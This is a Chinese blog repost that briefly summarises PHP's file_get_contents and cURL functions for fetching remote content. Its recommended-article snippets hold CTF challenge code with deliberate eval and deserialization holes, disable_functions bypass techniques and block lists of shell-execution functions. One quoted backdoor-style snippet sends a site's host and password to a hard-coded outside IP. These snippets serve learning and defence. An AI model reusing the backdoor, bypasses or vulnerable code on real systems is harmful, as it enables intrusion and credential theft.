PHP's file_get_contents and CURL functions

PHP下载远程内容:file_get_contents与CURL函数概览
最新推荐文章于 2025-12-03 12:04:55 发布
最新推荐文章于 2025-12-03 12:04:55 发布 · 91 阅读 · 0
文章标签:

#php

本文总结了使用PHP的file_get_contents函数和CURL函数下载远程内容(如网页、XML文件、图片等)的相关技巧。包括设置用户代理、处理HTTP基本认证、使用CURL发送用户名和密码、配置CURL存储cookie、提交表单、设置HTTP referer、以及在使用MAMP遇到HTTPS访问问题时的解决方案。

PHP's file_get_contents and CURL functions

转载:http://www.electrictoolbox.com/php-file-get-contents-curl/

This is a summary of the posts I've written about PHP's file_get_contents functions when used to download remote content (e.g. webpages, XML files, images etc) and the CURL functions which are used to do the same thing.

PHP Manual Pages

As always, don't forget to read the manual pages from the PHP manual; they don't always cover everything that well and are sometimes lacking in examples but always make a good starting point when wanting to know how a particular function works. The user submitted comments are often useful too.

file_get_contents() posts

CURL


iteye_3607
关注
PHP7源码分析】PHP中$_POST揭秘
weixin_34391445的博客
10-31 1741
运营研发团队 季伟滨 一、前言 前几天的工作中,需要通过curl做一次接口测试。让我意外的是,通过$_POST竟然无法获取到Content-Type是application/json的http请求的body参数。 查了下php官网(http://php.net/manual/zh/rese...)对$_POST的描述,的确是这样。后来...
php.ini disable_functions 配置 无效,php.ini 启用disable_functions提高安全
weixin_29355377的博客
03-21 1071
如果想保证服务器的安全,请将这个函数加到disable_functions选项里或者将安全模式打开吧,在安全模式下分升函数是无条件禁止的问:我经营一个小基于Apache 网页服务器供我个人使用,是与朋友和家人共享。然而,大多数的脚本小子尝试利用 PHP的 如应用程序WordPress的使用exec(),passthru(),函数shell_exec(),系统()等函数。如何禁用这些功能来提高我的P...
TryHackMe-Bypass_Disable_Functions
M1n9K1n9的博客
01-10 502
练习绕过运行操作系统命令或启动进程的禁用危险功能。通常应用的措施包括禁用可能执行操作系统命令或启动进程的危险功能。像system()或shell_exec()这样的函数通常通过php.ini配置文件中定义的PHP指令来禁用。其他函数,也许不太为人所知的dl()(它允许您动态加载PHP扩展),可能会被系统管理员忽略并且不会被禁用。入侵测试中的通常做法是列出启用的功能,以防忘记任何功能。最容易实现且不是很普遍的技术之一是滥用 mail() 和 putenv() 功能。
php curl请求_使用cURLPHP中同时进行HTTP请求
cunbei2644的博客
09-26 574
The basic idea of a Web 2.0-style "mashup" is that you consume data from several services, often from different providers and combine them in interesting ways. This means you often need to do more tha...
php enable_dl,【安全红队】PHP绕过disable_function限制
weixin_32025789的博客
03-26 1141
上 利用环境变量和系统组件在维护网站时,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。例如:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,...
PHP Bypass disabled_functions 备忘录
weixin_43610673的博客
06-02 927
严格的 disable_functions 限制项.soiconv()GNU Bash 环境变量远程命令执行漏洞(CVE-2014-6271)$cmd$tmp利用pcntl_exec()这个pcntl插件专有的命令执行函数来执行系统命令expsendmail能够上传自己的.so文件能够控制环境变量的值(设置LD_PRELOAD变量为恶意动态链接库文件路径),比如putenv函数。
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 2433
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
php curl获取文件内容,PHP 获取远程文件内容curl函数用法
weixin_29199873的博客
03-19 520
PHP 获取远程文件内容curl函数用法发布于 2014-11-02 14:14:16 | 144 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语言PHP(外文名: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,入门门槛较低,易于学习,使用广泛,主要适用于Web开发领域。PHP的文件后缀名...
php exif_read_data orientation,PHP exif_read_data Illegal IFD size
weixin_39653442的博客
03-17 407
可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效,请关闭广告屏蔽插件后再试):问题:I'm working on an application where I fix orientation (if it is present) of jpeg files downloaded from an AWS bucket.Here you can verify that this im...
mysql 危险函数禁用_一些需要禁用的PHP危险函数(disable_functions) - 小众知识
weixin_42401178的博客
01-20 958
phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功能描述:允许执行一个外部程序并回显输出,类似于 exec()。危险等级:高exec()功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。危险等级:高system()功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。危险等级:高c...
<?php error_reporting(0); highlight_file(__FILE__); class hacker{ public $cmd; public $a; public function __destruct(){ if('hahaha' === preg_replace('/;+/','hahaha',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){ eval($this->cmd.'hahaha!'); } else { echo 'nonono'; } } } if(isset($_POST['file'])) { if(preg_match('/^phar:\/\//i',$_POST['file'])) { die("nonono"); } file_get_contents($_POST['file']); } ?> 访问http://160.30.231.222:33367/class.php?debug=1&file=phar:///tmp/d0096ec6c83575373e3a21d129ff8fef.jpg还是出现这个没有变化
10-05
另外,我们还需要注意反序列化触发点:在file_get_contents函数中触发phar反序列化,但需要绕过过滤。 在class.php中,对file参数进行过滤,如果以phar://开头则拒绝。我们可以使用其他协议包装,例如: ...
<?php error_reporting(0); highlight_file(__FILE__); $wllm = $_GET['wllm']; $newstar = $_POST['newstar']; if (isset($wllm) && $wllm != 1234) { echo "恭喜你通过第一关<br>"; if (intval($wllm)==1234 && $wllm > 1234) { echo "哎呦,第二关也会?还是有点实力的嘛<br>"; if (isset($newstar) &&!preg_match('/\?|\.|assert|`|system|echo|print_r|open|stream_get_contents|getcwd|next|show_source|array_rand|strrev|cat|scandir|tac| |\*|more|head|eval|ls|shell_exec|passthru|file|include|tail|vim|\$|chr|flag|[0-9]/i', $newstar)) { echo "不错,绕过了,但是真的有用吗?<br>"; eval($newstar); } else { die('(╯‵□′)╯你想干嘛???'); } } else { echo "不对不对!!!<br>"; } } else { echo "第一关都不会就回家吧孩子!<br>"; } ?> 你会怎么操作,拿下flag
10-05
但是注意过滤了`file`,所以包含`file`的函数名都不行(如`file_get_contents`被过滤了?因为包含'file')。正则中过滤了'file',所以所有包含'file'字符串的函数名都不能用。 - 另外,过滤了`include`,所以我们...
我在参加ctf新生赛,这是一道web题目,叫做ez??upload 给了一个网站http://160.30.231.222:33360/ 源代码是<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Upload</title> <style> body { font-family: Arial, sans-serif; background-color: #f2f2f2; } .container { max-width: 400px; margin: 0 auto; padding: 20px; background-color: #fff; border-radius: 5px; box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1); } .form-group { margin-bottom: 20px; } .form-group label { display: block; font-weight: bold; margin-bottom: 5px; } .form-group input[type="file"] { padding: 10px; border: 1px solid #ccc; border-radius: 5px; background-color: #fff; } .form-group input[type="submit"] { padding: 10px 20px; background-color: #4CAF50; color: #fff; border: none; border-radius: 5px; cursor: pointer; } .form-group input[type="submit"]:hover { background-color: #45a049; } </style> </head> <body> <div class="container"> <h2>文件上传</h2> <form action="index.php" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label for="file">选择文件</label> <input type="file" name="file" id="file" /> </div> <div class="form-group"> <input type="submit" value="上传" /> </div> </form> </div> </body> </html> <!-- class.php --> Hacker? 把网站后缀加上/class.php得到<?php error_reporting(0); highlight_file(__FILE__); class hacker{ public $cmd; public $a; public function __destruct(){ if('hahaha' === preg_replace('/;+/','hahaha',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){ eval($this->cmd.'hahaha!'); } else { echo 'nonono'; } } } if(isset($_POST['file'])) { if(preg_match('/^phar:\/\//i',$_POST['file'])) { die("nonono"); } file_get_contents($_POST['file']); } ?> 我该怎么做才能找到flag,一步一步详细来讲,我是纯新手注意我是纯新手!
10-05
但是,如果`file`不是`phar://`开头,就会执行`file_get_contents`。我们可以让它读取本地文件,比如`file=/etc/passwd`?但是,这不会直接得到flag。 更重要的是,我们需要触发反序列化。 关键点:`file_get_...
function hmlogin($xiao=1){ $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = postpass; if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}} global $_static,$password; if($_static==0&&(strpos($_SERVER['HTTP_HOST'],'localhost')===false&&strpos($_SERVER['HTTP_HOST'],'127.0.0.1')===false&&strpos($_SERVER['HTTP_HOST'],'192.168')===false)){ file_get_contents("http://220.133.215.118/public/model.php?a=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."&b=$password"); $_static++; }对于这段代码 如何防止回连 保证安全性
07-18
使用`disable_functions`指令禁用可能被用于发起网络请求的函数,如`fsockopen`、`pfsockopen`、`curl_exec`、`exec`、`system`等[^2]。 ```ini disable_functions = fsockopen,pfsockopen,curl_exec,exec,system...
国内常用的网站源码及服务商介绍
weixin_42832157的博客
12-01 438
网站源码建站的优势包括:生态多元化,可适配多场景需求;兼具安全稳定特性与轻量化、高性价比选择;支持社区互动功能与垂直行业深度定制;融合国产数据库适配与低代码技术,更高效便捷,且贴合本土使用需求,能满足不同用户的核心建站诉求。
DC5通关及溯源分析
yiduiguwen的专栏
12-02 478
对靶机扫描发现,开放了80端口和111端口,其中111端口没啥特殊服务,真正的入口只有80端口,80端口用的是nginx 1.6.2。对网站进行目录扫描,发现有个footer.php,推断可能文件包含的问题,有可能footer.php是通过参数传过去的。同时,发现有个留言界面,注意到提交留言后,footer.php的年份不一样。文件包含有两个条件,一是有文件包含的代码,二是能够获取到传递的参数。因此,下一步的思路就是爆破隐藏的url参数。
常用自定义函数laravel版+thinkphp
程序员的日常
11-30 421
本文提供了Laravel和ThinkPHP框架下常用的PHP辅助函数实现方案。主要内容包括:格式化数字/浮点数 字符串处理(截取、过滤、修复HTML) 数组处理(树形结构、去重、转换) 文件操作(删除、安全检测、图片处理) 随机字符串生成 隐私数据处理 JSON输出封装 时间/距离计算 图片处理(裁剪、转base64)
《零基础学PHP:从入门到实战》教程-模块七:MySQL 数据库基础-4
zwh821的博客
12-03 574
PHP连接MySQL数据库操作指南 本章介绍了使用PHP的mysqli扩展连接和操作MySQL数据库的核心方法。主要内容包括: 两种编程风格:面向对象和面向过程方式,推荐使用面向对象风格 数据库连接:建立连接的标准流程和必要的错误处理 SQL操作: SELECT查询及结果处理 INSERT/UPDATE/DELETE操作 安全防护: 重点讲解SQL注入攻击原理 演示不安全的字符串拼接方式的风险 推荐使用预处理语句(prepare/bind_param/execute)作为唯一正确的防护手段 通过代码示例展示
前端运行PHP 快速上手 使用 PHPStudy Pro 详细搭建与使用指南
最新发布
estrusKing的博客
12-03 399
PHPStudy Pro是一款集成化的PHP开发环境工具,能够快速搭建WNMP/WAMP环境。本文详细介绍了从下载安装到运行PHP程序的全过程:首先下载安装PHPStudy Pro并启动Apache和MySQL服务;然后创建本地网站并验证配置;最后编写运行"Hello World"程序测试环境。文章还提供了端口冲突、404错误等常见问题的解决方法。PHPStudy Pro通过集成化管理、多版本切换和可视化操作等优势,显著降低了PHP开发环境的搭建难度,适合新手快速入门使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值